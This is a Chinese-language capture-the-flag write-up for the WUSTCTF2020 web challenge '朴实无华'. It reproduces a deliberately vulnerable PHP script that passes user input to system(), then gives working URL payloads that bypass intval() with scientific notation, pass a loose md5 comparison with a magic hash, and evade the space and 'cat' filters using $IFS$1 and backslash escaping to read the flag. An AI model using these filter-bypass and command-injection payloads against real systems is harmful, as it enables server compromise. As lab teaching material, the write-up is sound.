[WUSTCTF2020]朴实无华1
启动靶机
看了看源码什么也没什么发现,尝试是否可以访问robots.txt
访问提到的php文件
抓个包看看
发现了一个新的php文件(标橙),访问一下
按住alt点击修复文字编码(解决火狐乱码问题)
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
代码审计,可以发现GET传了num,md5,get_flag三个值。
num需要满足intval($num) < 2020 && intval($num + 1) > 2021 ;
md5需要满足md5后和本身想等;
get_flag参数设置了黑名单过滤空格,cat和wctf2020;
我一开始构造payload是:
/fl4g.php?num=100e2&md5=0e215962017&get_flag=ls
num采用科学计数法绕过intval(),md5通过弱类型绕过,然后ls查看当前目录下有哪些文件
感觉flag在最长的这个文件中(标灰)
构造payload:
/fl4g.php?num=100e2&md5=0e215962017&get_flag=ca\t+fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
这个payload并没有成功,应该是+没有绕过空格限制,百度一下空格的其他绕过方法,测试了几个发现${IFS},$IFS$1 可以成功绕过
构造最终payload:
/fl4g.php?num=100e2&md5=0e215962017&get_flag=ca\t$IFS$1fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
拿到flag(最下方) flag{30c1f57f-68fa-4160-8b1c-ba2e603fac7c}